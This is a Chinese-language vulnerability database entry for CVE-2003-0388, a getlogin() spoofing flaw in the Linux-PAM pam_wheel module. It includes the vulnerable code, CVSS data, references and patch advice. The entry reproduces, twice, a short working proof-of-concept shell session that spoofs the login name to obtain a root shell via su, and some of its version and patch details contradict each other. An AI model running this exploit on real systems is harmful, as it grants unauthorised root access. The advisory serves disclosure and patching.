CVE-2003-0388
CVSS4.6
发布时间 :2003-07-24 00:00:00
修订时间 :2016-10-17 22:33:13
NMCOES    

[原文]pam_wheel in Linux-PAM 0.78, with the trust option enabled and the use_uid option disabled, allows local users to spoof log entries and gain privileges by causing getlogin() to return a spoofed user name.


[CNNVD]Linux-PAM getlogin()可被欺骗漏洞(CNNVD-200307-045)

        
        Pluggable Authentication Module (PAM)是用于验证用户的机制。使用在多种Linux版本上。
        Linux-PAM中的pam_wheel没有安全地使用getlogin()函数,本地攻击者可以利用这个漏洞有可能绕过部分限制,无需密码获得root用户权限。
        pam_wheel模块一般结合su(1)允许属于可信组的用户无需密码使用部分命令。此模块利用getlogin()函数判断当前登录用户名,获取的用户名然后与配置文件中指定的可信组列表成员进行比较,下面是部分代码:
        fromsu = getlogin();
        if (fromsu) {
         tpwd = getpwnam(fromsu);
        }
        ...
        ...
        ...
        /*
        * 测试用户是否为组成员,或者用户是否把"wheel"作为它的首要组
        */
        if (is_on_list(grp->gr_mem, fromsu) || (tpwd->pw_gid == grp->gr_gid)) {
         if (ctrl & PAM_DENY_ARG) {
         retval = PAM_PERM_DENIED;
         } else if (ctrl & PAM_TRUST_ARG) {
         retval = PAM_SUCCESS; /* this can be a sufficient check
        */
         } else {
         retval = PAM_IGNORE;
         }
        } else {
        如果在pam_wheel配置文件中"trust"选项使能,而"use_uid"选项不使用的情况下,任意本地用户可以伪造由getlogin()返回的用户名,无需密码获得超级用户权限。
        不过上面的配置在多数Linux安装中不是默认配置。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0388
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0388
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-045
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105577915506761&w=2
(UNKNOWN)  BUGTRAQ  20030616 FW: iDEFENSE Security Advisory 06.16.03: Linux-PAM getlogin() Spoofing
http://www.idefense.com/advisory/06.16.03.txt
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/advisory/06.16.03.txt
http://www.redhat.com/support/errata/RHSA-2004-304.html
(UNKNOWN)  REDHAT  RHSA-2004:304

- 漏洞信息

Linux-PAM getlogin()可被欺骗漏洞
中危 访问验证错误
2003-07-24 00:00:00 2005-10-20 00:00:00
本地  
        
        Pluggable Authentication Module (PAM)是用于验证用户的机制。使用在多种Linux版本上。
        Linux-PAM中的pam_wheel没有安全地使用getlogin()函数,本地攻击者可以利用这个漏洞有可能绕过部分限制,无需密码获得root用户权限。
        pam_wheel模块一般结合su(1)允许属于可信组的用户无需密码使用部分命令。此模块利用getlogin()函数判断当前登录用户名,获取的用户名然后与配置文件中指定的可信组列表成员进行比较,下面是部分代码:
        fromsu = getlogin();
        if (fromsu) {
         tpwd = getpwnam(fromsu);
        }
        ...
        ...
        ...
        /*
        * 测试用户是否为组成员,或者用户是否把"wheel"作为它的首要组
        */
        if (is_on_list(grp->gr_mem, fromsu) || (tpwd->pw_gid == grp->gr_gid)) {
         if (ctrl & PAM_DENY_ARG) {
         retval = PAM_PERM_DENIED;
         } else if (ctrl & PAM_TRUST_ARG) {
         retval = PAM_SUCCESS; /* this can be a sufficient check
        */
         } else {
         retval = PAM_IGNORE;
         }
        } else {
        如果在pam_wheel配置文件中"trust"选项使能,而"use_uid"选项不使用的情况下,任意本地用户可以伪造由getlogin()返回的用户名,无需密码获得超级用户权限。
        不过上面的配置在多数Linux安装中不是默认配置。
        

- 公告与补丁

        厂商补丁:
        Andrew G. Morgan
        ----------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.kernel.org/pub/linux/libs/pam/

- 漏洞信息 (22781)

Linux-PAM 0.77 Pam_Wheel Module getlogin() Username Spoofing Privileged Escalation Vulnerability (EDBID:22781)
linux local
2003-06-16 Verified
0 Karol Wiesek
N/A [点击下载]
source: http://www.securityfocus.com/bid/7929/info

A vulnerability has been discovered in the Linux-Pam pam_wheel module. The problem exists in the way the module authenticates users under certain configurations. Specifically, if the module is configured to allow wheel group members to use the 'su' utility without supplying credentials and is not configured to verify the user's UID, it may be possible for a local attacker to elevated privileges.

This can be accomplished by spoofing the users login named, returned by the getlogin() function, to that of a logged in user of the wheel group.

Successful exploitation of this condition could ultimately result in an attacker gaining local root access on the target system. 

$ w
10:32am up 3:26, 2 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 7:13am 3:03m 0.30s 0.22s -bash
farmer pts/0 172.16.60.5 10:32am 0.00s 0.00s ? -

$ logname
farmer

$ ln /dev/tty tty1
$ bash < tty1

$ logname
root

$ su -
# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) 		

- 漏洞信息

9027
PAM getlogin Privilege Escalation

- 漏洞描述

- 时间线

2003-06-16 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux-PAM Pam_Wheel Module getlogin() Username Spoofing Privileged Escalation Vulnerability
Access Validation Error 7929
No Yes
2003-06-16 12:00:00 2009-07-11 10:06:00
The discovery of this vulnerability has been credited to Karol Wiesek (appelast@bsquad.sm.pl).

- 受影响的程序版本

RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Linux-PAM Linux-PAM 0.77
Linux-PAM Linux-PAM 0.78

- 不受影响的程序版本

Linux-PAM Linux-PAM 0.78

- 漏洞讨论

A vulnerability has been discovered in the Linux-Pam pam_wheel module. The problem exists in the way the module authenticates users under certain configurations. Specifically, if the module is configured to allow wheel group members to use the 'su' utility without supplying credentials and is not configured to verify the user's UID, it may be possible for a local attacker to elevated privileges.

This can be accomplished by spoofing the users login named, returned by the getlogin() function, to that of a logged in user of the wheel group.

Successful exploitation of this condition could ultimately result in an attacker gaining local root access on the target system.

- 漏洞利用

No exploit is required. However, the following proof of concept exploitation demonstration has been provided:

$ w
10:32am up 3:26, 2 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 7:13am 3:03m 0.30s 0.22s -bash
farmer pts/0 172.16.60.5 10:32am 0.00s 0.00s ? -

$ logname
farmer

$ ln /dev/tty tty1
$ bash &lt; tty1

$ logname
root

$ su -
# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

- 解决方案

It has been reported that Linux-PAM 0.78 is not affected by this issue. The vendor has announced that a fix for version 0.77 will not be released and a new version of Linux-Pam will also not be released. Users are advised to upgrade to the unaffected version as soon as possible.

Red Hat has released advisory RHSA-2004:304-05 and fixes to address this issue on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

A Fedora Legacy advisory (FLSA:152771) and updates are available to address this issue for Red Hat Linux. Please see the referenced advisory for further information in regards to obtaining and applying appropriate updates.


Linux-PAM Linux-PAM 0.77

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站